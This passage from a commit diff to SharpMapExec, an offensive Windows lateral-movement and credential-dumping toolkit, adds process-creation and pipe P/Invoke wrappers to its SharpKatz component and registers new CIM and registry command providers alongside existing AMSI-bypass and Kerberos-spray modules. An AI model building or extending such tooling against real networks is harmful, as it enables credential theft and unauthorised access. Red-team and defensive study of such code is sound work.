	290	+	//{
	291	+	//
	292	+	// if (!)
	293	+	// {
	294	+	// return false;
	295	+	// }
	296	+	// return true;
	297	+	//}
204	298		}
205	299		}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/SharpKatz/Win32/Natives.cs

		skipped 2256 lines
2257	2257		return CreateProcessWithLogonW(userName, domain, password, dwLogonFlags, applicationName, commandLine, dwCreationFlags, environment, currentDirectory, ref startupInfo, out processInformation);
2258	2258		}
2259	2259
	2260	+	public static bool CreateProcessWithLogonW(string userName, string domain, string password, LogonFlags dwLogonFlags, string applicationName, string commandLine, CreationFlags dwCreationFlags, uint environment, string currentDirectory, ref STARTUPINFOEX startupInfoEx, out PROCESS_INFORMATION processInformation)
	2261	+	{
	2262	+	IntPtr proc = GetProcAddress(GetAdvapi32(), "CreateProcessWithLogonW");
	2263	+	SysCall.Delegates.CreateProcessWithLogonWW CreateProcessWithLogonW = (SysCall.Delegates.CreateProcessWithLogonWW)Marshal.GetDelegateForFunctionPointer(proc, typeof(SysCall.Delegates.CreateProcessWithLogonWW));
	2264	+	return CreateProcessWithLogonW(userName, domain, password, dwLogonFlags, applicationName, commandLine, dwCreationFlags, environment, currentDirectory, ref startupInfoEx, out processInformation);
	2265	+	}
	2266	+
2260	2267		public static bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, ref SECURITY_ATTRIBUTES lpTokenAttributes, int ImpersonationLevel, int TokenType, ref IntPtr phNewToken)
2261	2268		{
2262	2269		IntPtr proc = GetProcAddress(GetKernelbase(), "DuplicateTokenEx");
		skipped 65 lines
2328	2335		IntPtr proc = GetProcAddress(GetAdvapi32(), "ImpersonateLoggedOnUser");
2329	2336		SysCall.Delegates.ImpersonateLoggedOnUser ImpersonateLoggedOnUser = (SysCall.Delegates.ImpersonateLoggedOnUser)Marshal.GetDelegateForFunctionPointer(proc, typeof(SysCall.Delegates.ImpersonateLoggedOnUser));
2330	2337		return ImpersonateLoggedOnUser(hToken);
	2338	+	}
	2339	+
	2340	+	//
	2341	+	[DllImport("kernel32.dll")]
	2342	+	public static extern bool CreatePipe(out IntPtr phReadPipe, out IntPtr phWritePipe, ref SECURITY_ATTRIBUTES lpPipeAttributes, uint nSize);
	2343	+
	2344	+	[DllImport("kernel32.dll", SetLastError = true)]
	2345	+	public static extern bool SetHandleInformation(IntPtr hObject, HANDLE_FLAGS dwMask, HANDLE_FLAGS dwFlags);
	2346	+
	2347	+	[DllImport("kernel32.dll", SetLastError = true)]
	2348	+	public static extern bool PeekNamedPipe(IntPtr handle, IntPtr buffer, IntPtr nBufferSize, IntPtr bytesRead, ref uint bytesAvail, IntPtr BytesLeftThisMessage);
	2349	+
	2350	+	[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
	2351	+	public static extern int GetConsoleOutputCP();
	2352	+
	2353	+	[DllImport("kernel32.dll", SetLastError = true)]
	2354	+	public static extern UInt32 WaitForSingleObject(IntPtr handle, UInt32 milliseconds);
	2355	+
	2356	+	[DllImport("kernel32.dll")]
	2357	+	public static extern bool WriteFile(IntPtr hFile, byte[] buffer, UInt32 nNumberOfBytesToWrite, out UInt32 lpNumberOfBytesWritten, [In] IntPtr lpOverlapped);
	2358	+
	2359	+	[Flags]
	2360	+	public enum HANDLE_FLAGS : uint
	2361	+	{
	2362	+	None = 0,
	2363	+	INHERIT = 1,
	2364	+	PROTECT_FROM_CLOSE = 2
	2365	+	}
	2366	+
	2367	+	[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
	2368	+	public struct STARTUPINFOEX
	2369	+	{
	2370	+	public STARTUPINFO StartupInfo;
	2371	+	public IntPtr lpAttributeList;
2331	2372		}
2332	2373		}
2333	2374		}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/SharpKatz/Win32/Syscall.cs

		skipped 439 lines
440	440		public delegate bool CreateProcessWithLogonW(string userName, string domain, string password, LogonFlags dwLogonFlags, string applicationName, string commandLine, CreationFlags dwCreationFlags, uint environment, string currentDirectory, ref STARTUPINFO startupInfo, out PROCESS_INFORMATION processInformation);
441	441
442	442		[SuppressUnmanagedCodeSecurity]
	443	+	[UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Unicode)]
	444	+	public delegate bool CreateProcessWithLogonWW(string userName, string domain, string password, LogonFlags dwLogonFlags, string applicationName, string commandLine, CreationFlags dwCreationFlags, uint environment, string currentDirectory, ref STARTUPINFOEX startupInfo, out PROCESS_INFORMATION processInformation);
	445	+
	446	+	[SuppressUnmanagedCodeSecurity]
443	447		[UnmanagedFunctionPointer(CallingConvention.StdCall)]
444	448		public delegate bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, ref SECURITY_ATTRIBUTES lpTokenAttributes, int ImpersonationLevel, int TokenType, ref IntPtr phNewToken);
445	449
		skipped 38 lines

■ ■ ■ ■ ■ ■

SharpMapExec/SharpMapExec.csproj

		skipped 39 lines
40	40		<Reference Include="Microsoft.Dynamic, Version=1.3.0.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1, processorArchitecture=MSIL">
41	41		<HintPath>..\packages\DynamicLanguageRuntime.1.3.0\lib\net45\Microsoft.Dynamic.dll</HintPath>
42	42		</Reference>
	43	+	<Reference Include="Microsoft.Management.Infrastructure, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
	44	+	<HintPath>..\packages\Microsoft.Management.Infrastructure.4.0.0\lib\Microsoft.Management.Infrastructure.dll</HintPath>
	45	+	</Reference>
43	46		<Reference Include="Microsoft.Scripting, Version=1.3.0.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1, processorArchitecture=MSIL">
44	47		<HintPath>..\packages\DynamicLanguageRuntime.1.3.0\lib\net45\Microsoft.Scripting.dll</HintPath>
45	48		</Reference>
		skipped 23 lines
69	72		<Compile Include="Args\ArgumentParserResult.cs" />
70	73		<Compile Include="Args\CommandCollection.cs" />
71	74		<Compile Include="Args\Info.cs" />
	75	+	<Compile Include="Commands\kerberosReg32.cs" />
72	76		<Compile Include="Commands\KerberosTgtdeleg.cs" />
73	77		<Compile Include="Commands\ICommand.cs" />
74	78		<Compile Include="Commands\kerberosSmb.cs" />
75	79		<Compile Include="Commands\KerberosSpray.cs" />
76	80		<Compile Include="Commands\kerberosWinrm.cs" />
	81	+	<Compile Include="Commands\NtlmReg32.cs" />
77	82		<Compile Include="Commands\NtlmSmb.cs" />
	83	+	<Compile Include="Commands\NtlmCim.cs" />
78	84		<Compile Include="Commands\NtlmWinrm.cs" />
79	85		<Compile Include="Helpers\AmsiFail.cs" />
80	86		<Compile Include="Helpers\Misc.cs" />
		skipped 1 lines
82	88		<Compile Include="Helpers\Tasks.cs" />
83	89		<Compile Include="Helpers\Impersonator.cs" />
84	90		<Compile Include="Helpers\Jea.cs" />
	91	+	<Compile Include="Lib\Cim.cs" />
	92	+	<Compile Include="Lib\Reg32.cs" />
	93	+	<Compile Include="Lib\Scan.cs" />
85	94		<Compile Include="Projects\HiveParser\Crypto.cs" />
86	95		<Compile Include="Projects\HiveParser\LsaSecret.cs" />
87	96		<Compile Include="Projects\HiveParser\NL_Record.cs" />
		skipped 1 lines
89	98		<Compile Include="Projects\HiveParser\Registry.cs" />
90	99		<Compile Include="Projects\HiveParser\RegistryHive.cs" />
91	100		<Compile Include="Projects\HiveParser\ValueKey.cs" />
92		-	<Compile Include="Lib\KerberosSmb.cs" />
93		-	<Compile Include="Lib\KerberosWinrm.cs" />
94		-	<Compile Include="Lib\NtlmSmb.cs" />
95		-	<Compile Include="Lib\NtlmWinrm.cs" />
	101	+	<Compile Include="Lib\Kerberos.cs" />
	102	+	<Compile Include="Lib\Ntlm.cs" />
96	103		<Compile Include="Lib\Secrets.cs" />
97	104		<Compile Include="Lib\Smb.cs" />
98	105		<Compile Include="Lib\Wsman.cs" />
		skipped 142 lines
241	248		</ItemGroup>
242	249		<ItemGroup>
243	250		<None Include="Helpers\JeaRules.ps1" />
	251	+	<None Include="packages.config" />
244	252		</ItemGroup>
245	253		<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
246	254		</Project>

SharpMapExec/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache

Binary file.
■ ■ ■ ■ ■ ■

SharpMapExec/packages.config

1 + <?xml version="1.0" encoding="utf-8"?>
2 + <packages>
3 + <package id="Microsoft.Management.Infrastructure" version="4.0.0" targetFramework="net45" />
4 + </packages>

All occurrences
packages/Microsoft.Management.Infrastructure.4.0.0/.signature.p7s

Binary file.
packages/Microsoft.Management.Infrastructure.4.0.0/Microsoft.Management.Infrastructure.4.0.0.nupkg

Binary file.
packages/Microsoft.Management.Infrastructure.4.0.0/lib/Microsoft.Management.Infrastructure.dll

Binary file.

1	+	<?xml version="1.0" encoding="utf-8"?>
2	+	<packages>
3	+	<package id="Microsoft.Management.Infrastructure" version="4.0.0" targetFramework="net45" />
4	+	</packages>

Cim & Reg32 providers added, code cleanup, added stdin pipe for /system & and /delegwalk